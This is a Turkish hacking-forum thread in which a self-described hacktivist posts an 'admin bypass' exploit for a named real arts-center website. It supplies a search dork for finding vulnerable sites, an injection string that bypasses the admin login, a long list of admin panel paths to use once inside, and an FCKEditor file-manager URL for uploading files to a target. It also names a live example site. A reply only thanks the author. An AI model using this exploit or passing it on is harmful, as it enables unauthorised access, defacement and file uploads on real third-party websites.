Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Indian Performing Art Center Admin ByPass Vulnerability
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 55
Yaşam Puanı: 1,369 / 1,369
Deneyim: 78 / 100
Rep Sayısı: 2742
Mesaj Sayısı: 6282
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Indian Performing Art Center Admin ByPass Vulnerability
08.06.2018 17:11
################################################################################​#################

# Exploit Title : Copyright © 2014 Indian Performing Art Center Admin Control Panel ByPass Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Date : 08/06/2018
# Vendor Homepage : ipacglobal.com
# Social Media Page : facebook.com/India-Performing-Arts-Center-249492318418992/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 [ Permissions, Privileges, and Access Controls ]
* CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
* CWE-592 [ Authentication Bypass Issues ]

################################################################################​#################

# Google Dork : intext:''Copyright © 2014- All Rights Reserved Press| Indian Performing Art Center ::''

# Admin Panel Login Path : /admin

# Exploit : Login both for admin username and password as => '=''or'

# Possible Admin Control Panel Useable URL Paths :

/admin/editpages.php
/admin/editpages.php?id=1
/admin/editpages.php?id=2
/admin/editpages.php?id=3
/admin/editpages.php?id=4
/admin/editpages.php?id=5
/admin/editpages.php?id=6
/admin/editpages.php?id=7
/admin/editpages.php?id=8
/admin/editpages.php?id=9
/admin/editpages.php?id=10
/admin/editpages.php?id=11
/admin/editpages.php?id=12
/admin/addcategory.php
/admin/gallery.php?g_id=1
/admin/gallery.php?g_id=13
/admin/gallery.php?g_id=14
/admin/event.php
/admin/event.php?addcat=addcat
/admin/event.php?edit=edit&catid=1
/admin/videos.php
/admin/videos.php?addcat=addcat
/admin/videos.php?edit=edit&catid=1
/admin/fogana.php
/admin/fogana.php?edit=edit&fogana=1
/admin/addtestmoni.php
/admin/testimonials.php?edit=edit&catid=9

Add Image =>

/admin/addimage.php?action=add&g_id=1

Edit Image with Height and Width

/admin/edit.php?g_id=1&action=del&pid=1&height=200&width=350

PATH => /products/flash/....



################################################################################​#################

FCKEditor Vulnerability [ You can select File ~ Image ~ Flash ~ Media ]

/admin/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http.//TARGETSITE/admin/fckeditor/editor/filemanager/connectors/php/Fconnector.php

PATH => /admin/images/image/.....

PATH => /admin/images/file/....

################################################################################​#################

# Example Site => ipacglobal.com

################################################################################​#################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################################​#################
(Bu konu en son: 08.06.2018 Tarihinde, Saat: 17:13 düzenlenmiştir. Düzenleyen: KingSkrupellos.)

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
Meczup
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 629 / 629
Deneyim: 16 / 100
Rep Sayısı: 82
Mesaj Sayısı: 852
Üyelik Tarihi: 18.12.2017
      
Yorum: #2
Cvp: Indian Performing Art Center Admin ByPass Vuln
08.06.2018 17:13
Emeğine Sağlık Smile
Alinti



1 Ziyaretçi